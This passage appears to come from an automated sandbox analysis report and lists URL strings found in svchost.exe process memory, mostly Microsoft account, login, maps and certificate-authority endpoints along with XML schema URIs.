                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1284162340.000001E91FC3E000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                    Source: svchost.exe, 00000023.00000002.1281395121.000001E91F713000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd/Encr
                    Source: svchost.exe, 00000023.00000002.1280248925.000001E91EE5C000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
                    Source: CCFEED7EF3CD3BBD21329435542A98D2_9C2DDAC79C917837883918D6BB58BE90.35.drString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQQX6Z6gAidtSefNc6DC0OInqPHDQQUD4BhHIIxYdUvKOe
                    Source: svchost.exe, 00000023.00000002.1284162340.000001E91FC3E000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQQX6Z6gAidtSefNc6tiox
                    Source: svchost.exe, 00000021.00000002.588532098.000001AB9E6EA000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0
                    Source: svchost.exe, 00000007.00000002.597695297.000001CC04417000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                    Source: svchost.exe, 00000023.00000003.1128871295.000001E91FC43000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com1.3.6.1.5.5.7.48.2http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.c
                    Source: svchost.exe, 00000023.00000002.1283907175.000001E91FC13000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com:80/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQQX6Z6gAidtSefNc6DC0OInqPHDQQUD4BhHIIxYdUv
                    Source: svchost.exe, 00000023.00000002.1280404405.000001E91EE92000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootCA.crlhttp://crl4.digicert.com/Di
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertSHA2SecureServerCA.crlhttp://crl4.digicert.
                    Source: svchost.exe, 00000007.00000002.597695297.000001CC04417000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1128871295.000001E91FC43000.00000004.00000001.sdmpString found in binary or memory: http://passport.net/tb
                    Source: svchost.exe, 00000023.00000003.811444618.000001E91F757000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.818192640.000001E91F72E000.00000004.00000001.sdmpString found in binary or memory: http://schemas.mi
                    Source: svchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                    Source: svchost.exe, 00000007.00000003.597153512.000001CC7ECA4000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/enumeration/Enumerate
                    Source: svchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
                    Source: svchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.811539482.000001E91F762000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                    Source: svchost.exe, 00000023.00000003.811539482.000001E91F762000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc1A=
                    Source: svchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scicy
                    Source: svchost.exe, 00000023.00000002.1281474062.000001E91F764000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scr
                    Source: svchost.exe, 00000023.00000002.1281474062.000001E91F764000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scs-cbc
                    Source: svchost.exe, 00000023.00000003.1128521121.000001E91F752000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scsis-200
                    Source: svchost.exe, 00000023.00000003.817201176.000001E91F73B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                    Source: svchost.exe, 00000023.00000003.817330267.000001E91F732000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.817201176.000001E91F73B000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                    Source: svchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue(
                    Source: svchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                    Source: svchost.exe, 00000023.00000002.1281444114.000001E91F737000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                    Source: svchost.exe, 00000025.00000002.958877289.00000237FDA60000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
                    Source: svchost.exe, 0000000E.00000002.310250602.000002C4B4613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: http://www.digicert.com/CPS0~
                    Source: svchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
                    Source: svchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpString found in binary or memory: http://www.g5e.com/termsofservice
                    Source: svchost.exe, 00000021.00000003.560024463.000001AB9EF9D000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/privacy
                    Source: svchost.exe, 00000021.00000003.560024463.000001AB9EF9D000.00000004.00000001.sdmpString found in binary or memory: http://www.hulu.com/terms
                    Source: svchost.exe, 00000023.00000002.1281425866.000001E91F732000.00000004.00000001.sdmpString found in binary or memory: http://www.w3.
                    Source: svchost.exe, 0000000B.00000002.1280219876.000001CE16A43000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                    Source: svchost.exe, 0000000B.00000002.1280219876.000001CE16A43000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                    Source: svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&amp;id=80502
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80600
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80601
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80603
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80604
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809800002.000001E91F730000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&amp;id=80605
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=806018204055Z0#1
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809800002.000001E91F730000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://account.live.com/msangcwam
                    Source: svchost.exe, 0000000B.00000002.1280219876.000001CE16A43000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                    Source: svchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                    Source: svchost.exe, 0000000B.00000002.1280219876.000001CE16A43000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                    Source: svchost.exe, 0000000B.00000002.1280219876.000001CE16A43000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                    Source: svchost.exe, 00000021.00000003.569537368.000001AB9EF7D000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569479296.000001AB9EF20000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/contact/
                    Source: svchost.exe, 00000021.00000003.569537368.000001AB9EF7D000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569479296.000001AB9EF20000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569716300.000001AB9EF74000.00000004.00000001.sdmpString found in binary or memory: https://corp.roblox.com/parents/
                    Source: svchost.exe, 0000000E.00000003.309587482.000002C4B4649000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                    Source: svchost.exe, 0000000E.00000002.310282027.000002C4B463D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                    Source: svchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                    Source: svchost.exe, 0000000E.00000003.309234233.000002C4B464F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                    Source: svchost.exe, 0000000E.00000002.310282027.000002C4B463D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                    Source: svchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                    Source: svchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                    Source: svchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                    Source: svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
                    Source: svchost.exe, 0000000E.00000003.309733634.000002C4B4640000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                    Source: svchost.exe, 0000000E.00000003.309733634.000002C4B4640000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                    Source: svchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                    Source: svchost.exe, 0000000E.00000003.309733634.000002C4B4640000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000002.310290532.000002C4B464B000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                    Source: svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?entry=
                    Source: svchost.exe, 0000000E.00000003.309587482.000002C4B4649000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                    Source: svchost.exe, 0000000E.00000002.310290532.000002C4B464B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                    Source: svchost.exe, 0000000E.00000002.310290532.000002C4B464B000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                    Source: svchost.exe, 0000000E.00000003.309313094.000002C4B4663000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000003.309587482.000002C4B4649000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                    Source: svchost.exe, 0000000E.00000003.309432644.000002C4B4660000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                    Source: svchost.exe, 0000000E.00000002.310282027.000002C4B463D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                    Source: svchost.exe, 0000000E.00000003.287069493.000002C4B462F000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                    Source: svchost.exe, 00000021.00000003.569537368.000001AB9EF7D000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.569479296.000001AB9EF20000.00000004.00000001.sdmpString found in binary or memory: https://en.help.roblox.com/hc/en-us
                    Source: svchost.exe, 00000021.00000003.561078646.000001AB9EF6C000.00000004.00000001.sdmpString found in binary or memory: https://instagram.com/hiddencity_
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/
                    Source: svchost.exe, 00000023.00000002.1280248925.000001E91EE5C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ApproveSession.srf
                    Source: svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80502
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80600
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&amp;id=80601
                    Source: svchost.exe, 00000023.00000003.809599953.000001E91F70E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
                    Source: svchost.exe, 00000023.00000003.809599953.000001E91F70E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
                    Source: svchost.exe, 00000023.00000003.809599953.000001E91F70E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ListSessions.srf
                    Source: svchost.exe, 00000023.00000002.1280248925.000001E91EE5C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ManageApprover.srf
                    Source: svchost.exe, 00000023.00000002.1280248925.000001E91EE5C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ManageLoginKeys.srf
                    Source: svchost.exe, 00000023.00000002.1284004591.000001E91FC29000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809525843.000001E91F740000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280404405.000001E91EE92000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/RST2.srf
                    Source: svchost.exe, 00000023.00000002.1280613714.000001E91EED2000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/RST2.srfLMEMX
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/RST2.srfy
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/didtou.srf
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/getrealminfo.srf
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/getuserrealm.srf
                    Source: svchost.exe, 00000023.00000003.809867311.000001E91F74B000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/pH
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809384646.000001E91F761000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfoken
                    Source: svchost.exe, 00000023.00000003.809384646.000001E91F761000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
                    Source: svchost.exe, 00000023.00000002.1280248925.000001E91EE5C000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
                    Source: svchost.exe, 00000023.00000003.809384646.000001E91F761000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
                    Source: svchost.exe, 00000023.00000003.809384646.000001E91F761000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
                    Source: svchost.exe, 00000023.00000002.1280248925.000001E91EE5C000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cplive.com
                    Source: svchost.exe, 00000023.00000003.811369632.000001E91F72F000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809505817.000001E91F735000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfsrfsrf060805&fid=cp.live.com
                    Source: svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKey
                    Source: svchost.exe, 00000023.00000003.809384646.000001E91F761000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
                    Source: svchost.exe, 00000023.00000003.809384646.000001E91F761000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809800002.000001E91F730000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
                    Source: svchost.exe, 00000023.00000003.809384646.000001E91F761000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
                    Source: svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
                    Source: svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809800002.000001E91F730000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809800002.000001E91F730000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809800002.000001E91F730000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809800002.000001E91F730000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809365345.000001E91F750000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809297166.000001E91F72E000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&amp;fid=cp
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
                    Source: svchost.exe, 00000023.00000003.809487394.000001E91F729000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809763951.000001E91F748000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809800002.000001E91F730000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.809334193.000001E91F777000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
                    Source: svchost.exe, 00000023.00000002.1280248925.000001E91EE5C000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
                    Source: svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
                    Source: svchost.exe, 00000023.00000002.1280118155.000001E91EE3D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1280711050.000001E91EF02000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srf
